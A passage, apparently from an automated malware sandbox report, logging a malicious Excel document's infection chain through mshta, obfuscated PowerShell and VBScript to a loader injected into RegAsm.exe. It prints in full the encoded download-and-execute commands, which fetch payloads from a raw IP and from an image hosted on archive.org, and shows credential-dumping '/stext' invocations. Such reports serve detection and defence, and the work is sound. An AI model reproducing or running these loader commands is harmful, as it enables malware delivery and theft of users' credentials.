                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,21_2_004182CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,26_2_00410DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,21_2_00418758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ_0230909024SEPT.xla.xlsx
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR89E7.tmp
                Source: RFQ_0230909024SEPT.xla.xlsxOLE indicator, Workbook stream: true
                Source: B3930000.0.drOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................[.......[.....}..w.............................1......(.P..............3........!.............`-[.............
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................s..l....}..w....`-[.....\.......................(.P.....................8...............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................s..l....}..w....`-[.....\.......................(.P.....................8...............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..4L........l......K.....(.P............................. .......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.....l.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`-[.....}..w.............4L........l......K.....(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`-[.............0..<;....WZ.....}..w....8.......@E......^...............(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`-[.................;....WZ.....}..w....8.......@E......^...............(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...[.....}..w.............................1......(.P..............3......................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................[.....}..w......[......................1......(.P.....................................................
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000017.00000002.525585538.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: RFQ_0230909024SEPT.xla.xlsxReversingLabs: Detection: 13%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? 